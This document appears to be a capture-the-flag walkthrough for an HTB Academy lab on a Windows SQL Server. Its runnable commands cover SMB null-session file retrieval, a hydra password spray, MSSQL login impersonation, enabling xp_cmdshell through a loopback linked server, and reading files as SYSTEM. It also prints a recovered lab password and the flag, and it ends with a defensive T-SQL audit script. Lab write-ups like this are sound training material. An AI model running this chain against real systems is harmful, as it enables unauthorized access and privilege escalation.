Attacking Common Services - Hard

ℹ️ Information

โ“Question

What file can you retrieve that belongs to the user "simon"? (Format: filename.txt)

📋 Walkthrough

Full port scan

┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ nmap -p- --min-rate=10000 $target
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-20 21:08 UTC
Nmap scan report for inlanefreight.htb (10.129.203.10)
Host is up (0.027s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT     STATE SERVICE
135/tcp  open  msrpc
445/tcp  open  microsoft-ds
1433/tcp open  ms-sql-s
3389/tcp open  ms-wbt-server

Nmap done: 1 IP address (1 host up) scanned in 13.48 seconds

It's a Windows Server. Let's run a version and script scan against these four ports to gather more information about the services behind them.

Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-20 21:09 UTC
Nmap scan report for inlanefreight.htb (10.129.203.10)
Host is up (0.026s latency).

PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
445/tcp  open  microsoft-ds?
1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info: 
|   10.129.203.10:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack lev: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
|_ssl-date: 2025-03-20T20:09:44+00:00; -1h00m05s from scanner time.
| ms-sql-ntlm-info: 
|   10.129.203.10:1433: 
|     Target_Name: WIN-HARD
|     NetBIOS_Domain_Name: WIN-HARD
|     NetBIOS_Computer_Name: WIN-HARD
|     DNS_Domain_Name: WIN-HARD
|     DNS_Computer_Name: WIN-HARD
|_    Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-03-20T20:04:21
|_Not valid after:  2055-03-20T20:04:21
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: WIN-HARD
|   NetBIOS_Domain_Name: WIN-HARD
|   NetBIOS_Computer_Name: WIN-HARD
|   DNS_Domain_Name: WIN-HARD
|   DNS_Computer_Name: WIN-HARD
|   Product_Version: 10.0.17763
|_  System_Time: 2025-03-20T20:09:04+00:00
| ssl-cert: Subject: commonName=WIN-HARD
| Not valid before: 2025-03-19T20:04:10
|_Not valid after:  2025-09-18T20:04:10
|_ssl-date: 2025-03-20T20:09:44+00:00; -1h00m05s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2025-03-20T20:09:06
|_  start_date: N/A
|_clock-skew: mean: -1h00m05s, deviation: 0s, median: -1h00m05s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 48.11 seconds

We have identified several open ports, including SMB (445/tcp) and Microsoft SQL Server (1433/tcp). Let's try to connect to the SMB service using a null session.

┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ smbclient -N -L //$target

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        Home            Disk      
        IPC$            IPC       Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.203.10 failed (Error NT_STATUS_IO_TIMEOUT)
Unable to connect with SMB1 -- no workgroup available

┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ smbclient -N //$target/Home
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Apr 21 21:18:21 2022
  ..                                  D        0  Thu Apr 21 21:18:21 2022
  HR                                  D        0  Thu Apr 21 20:04:39 2022
  IT                                  D        0  Thu Apr 21 20:11:44 2022
  OPS                                 D        0  Thu Apr 21 20:05:10 2022
  Projects                            D        0  Thu Apr 21 20:04:48 2022

                7706623 blocks of size 4096. 3143820 blocks available
smb: \>

We successfully connected to the Home share. Let's download all files from this share to our local machine.

smb: \> recurse ON
smb: \> mget *

In Simon's folder, there's a file named random.txt.

Answer

random.txt

โ“Question

Enumerate the target and find a password for the user Fiona. What is her password?

📋 Walkthrough

After downloading the files from the SMB share, we have the following directory structure:

└─$ tree
.
├── Fiona
│   └── creds.txt
├── John
│   ├── information.txt
│   ├── notes.txt
│   └── secrets.txt
└── Simon
    └── random.txt

creds.txt is a list of candidate passwords. Let's test them against the user fiona with hydra (the run below uses hydra's RDP module, not MSSQL):

โ”Œโ”€โ”€(kaliใ‰ฟkali)-[~/Desktop/HTB/Academy]
โ””โ”€$ hydra -l fiona -P creds.txt rdp://$target
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-03-20 21:30:37
[WARNING] rdp servers often don't like many connections, use -t 1 or -t 4 to reduce the number of parallel connections and -W 1 or -W 3 to wait between connection to allow the server to recover
[INFO] Reduced number of tasks to 4 (rdp does not like many parallel connections)
[WARNING] the rdp module is experimental. Please test, report - and if possible, fix.
[DATA] max 4 tasks per 1 server, overall 4 tasks, 15 login tries (l:1/p:15), ~4 tries per task
[DATA] attacking rdp://10.129.203.10:3389/
[3389][rdp] account on 10.129.203.10 might be valid but account not active for remote desktop: login: fiona password: 48Ns72!bns74@S84NNNSl, continuing attacking the account.
[ERROR] freerdp: The connection failed to establish.
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-03-20 21:30:41

Hydra flags 48Ns72!bns74@S84NNNSl as probably valid for fiona, even though the account is not allowed to use Remote Desktop. Let's try the credentials fiona:48Ns72!bns74@S84NNNSl on the MSSQL server instead. It works!

┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ impacket-mssqlclient fiona@$target -windows-auth
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(WIN-HARD\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(WIN-HARD\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (WIN-HARD\Fiona  guest@master)>

Answer

48Ns72!bns74@S84NNNSl

โ“Question

Once logged in, what other user can we compromise to gain admin privileges?

📋 Walkthrough

After logging in as Fiona, let's enumerate the databases on the MSSQL server.

SQL (WIN-HARD\Fiona  guest@master)> SELECT name FROM master.dbo.sysdatabases
name
---------
master
tempdb
model
msdb
TestingDB
TestAppDB

Let's switch to the TestingDB database and enumerate its tables. It turns out to contain none.

INFO(WIN-HARD\SQLEXPRESS): Line 1: Changed database context to 'TestingDB'.
SQL (WIN-HARD\Fiona  WIN-HARD\Fiona@TestingDB)> SELECT * FROM TestingDB.INFORMATION_SCHEMA.TABLES;
TABLE_CATALOG   TABLE_SCHEMA   TABLE_NAME   TABLE_TYPE   
-------------   ------------   ----------   ----------   
SQL (WIN-HARD\Fiona  WIN-HARD\Fiona@TestingDB)>

Next, let's check for users with impersonation privileges.

SQL (WIN-HARD\Fiona  guest@msdb)> SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'
name
-----
john
simon

We found that the users john and simon have impersonation privileges. Let's switch to the user john and check his privileges.

SQL (john  guest@master)> SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'
name
----
john

SQL (john  guest@master)> SELECT SYSTEM_USER

----
john

SQL (john  guest@master)> SELECT IS_SRVROLEMEMBER('sysadmin')

-
0

John is not a member of the sysadmin role on this instance, but queries sent through the linked server run under whatever login the link maps to, so we can use it to escalate our privileges. Let's check the security context on the other side of the link:

SQL (john  guest@master)> EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [LOCAL.TEST.LINKED.SRV]

-   -   -   -   
1   1   1   1

Answer

john

โ“Question

Submit the contents of the flag.txt file on the Administrator Desktop.

📋 Walkthrough

In the file information.txt from John's folder we see a note:

To do:
- Keep testing with the database.
- Create a local linked server.
- Simulate Impersonation.

Let's check for local linked servers:

SQL (john  guest@master)> SELECT srvname, isremote FROM sysservers
srvname                 isremote
---------------------   --------
WINSRV02\SQLEXPRESS            1
LOCAL.TEST.LINKED.SRV          0

SQL (john  guest@master)>

We found a local linked server named LOCAL.TEST.LINKED.SRV (isremote = 0). Since queries sent through it run with sysadmin rights, let's enable advanced options and xp_cmdshell through the link to execute system commands.

SQL (john  guest@master)> EXEC ('sp_configure ''show advanced options'', 1') AT [LOCAL.TEST.LINKED.SRV]
INFO(WIN-HARD\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (john  guest@master)> EXEC ('RECONFIGURE') AT [LOCAL.TEST.LINKED.SRV]
SQL (john  guest@master)> EXEC ('sp_configure ''xp_cmdshell'',1') AT [LOCAL.TEST.LINKED.SRV]
INFO(WIN-HARD\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (john  guest@master)> EXEC ('RECONFIGURE') AT [LOCAL.TEST.LINKED.SRV]
SQL (john  guest@master)>

Now, we can use xp_cmdshell to execute system commands. Let's check the current user context.

SQL (john  guest@master)> EXEC ('xp_cmdshell ''whoami''') AT [LOCAL.TEST.LINKED.SRV]
output
-------------------
nt authority\system
NULL

We are running as nt authority\system, which has administrative privileges. Now, let's read the contents of the flag.txt file on the Administrator's Desktop.

SQL (john  guest@master)> EXEC ('xp_cmdshell ''type C:\Users\Administrator\Desktop\flag.txt''') AT [LOCAL.TEST.LINKED.SRV]
output                        
---------------------------   
HTB{46u$!n9_l!nk3d_$3rv3r$}   
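As an added defensive check (not part of the original walkthrough), the following T-SQL audit surfaces the three conditions this chain relies on: IMPERSONATE grants, joined on the login actually being impersonated rather than on the grantor as in the query above; a linked server that points back at the same instance with RPC Out enabled; and the xp_cmdshell setting together with the service account that made its output run as SYSTEM. It uses only documented catalog views and is meant to be run by a sysadmin on the instance.

```sql
-- Added audit script, not from the walkthrough; run as sysadmin on the instance.

-- 1. IMPERSONATE grants: who may become which login.
--    For a class-101 (SERVER_PRINCIPAL) permission, major_id is the login being
--    impersonated and grantee_principal_id is the login that received the right.
SELECT grantee.name AS grantee_login,
       target.name  AS impersonated_login,
       p.state_desc
FROM sys.server_permissions AS p
JOIN sys.server_principals AS grantee ON grantee.principal_id = p.grantee_principal_id
JOIN sys.server_principals AS target  ON target.principal_id  = p.major_id
WHERE p.class = 101
  AND p.permission_name = 'IMPERSONATE';

-- 2. Linked servers: data source, whether RPC Out permits EXEC ... AT, and the
--    login mapping. uses_self_credential = 0 with a remote_name means every
--    caller is mapped to one fixed (possibly privileged) remote login.
SELECT s.name                 AS linked_server,
       s.data_source,
       s.is_rpc_out_enabled,
       s.is_data_access_enabled,
       ll.uses_self_credential,
       ll.remote_name         AS mapped_remote_login,
       lp.name                AS local_login,      -- NULL = mapping applies to all logins
       CASE WHEN UPPER(s.data_source) IN (UPPER(@@SERVERNAME), 'LOCALHOST', '(LOCAL)', '.')
            THEN 1 ELSE 0 END AS points_to_self    -- loopback link, as on this box
FROM sys.servers AS s
LEFT JOIN sys.linked_logins     AS ll ON ll.server_id = s.server_id
LEFT JOIN sys.server_principals AS lp ON lp.principal_id = ll.local_principal_id
WHERE s.is_linked = 1;

-- 3. xp_cmdshell state (value_in_use = 1 means it is enabled right now).
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell');

-- 4. Service account: xp_cmdshell runs as this account, so a LocalSystem
--    service is what turns a SQL foothold into nt authority\system.
SELECT servicename, service_account
FROM sys.dm_server_services
WHERE servicename LIKE 'SQL Server (%';
```

Each hit maps to a fix: revoke the IMPERSONATE grant, drop the loopback link or disable RPC Out and the fixed login mapping on it, leave xp_cmdshell disabled, and run the Database Engine under a low-privilege service account.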

Answer

HTB{46u$!n9_l!nk3d_$3rv3r$}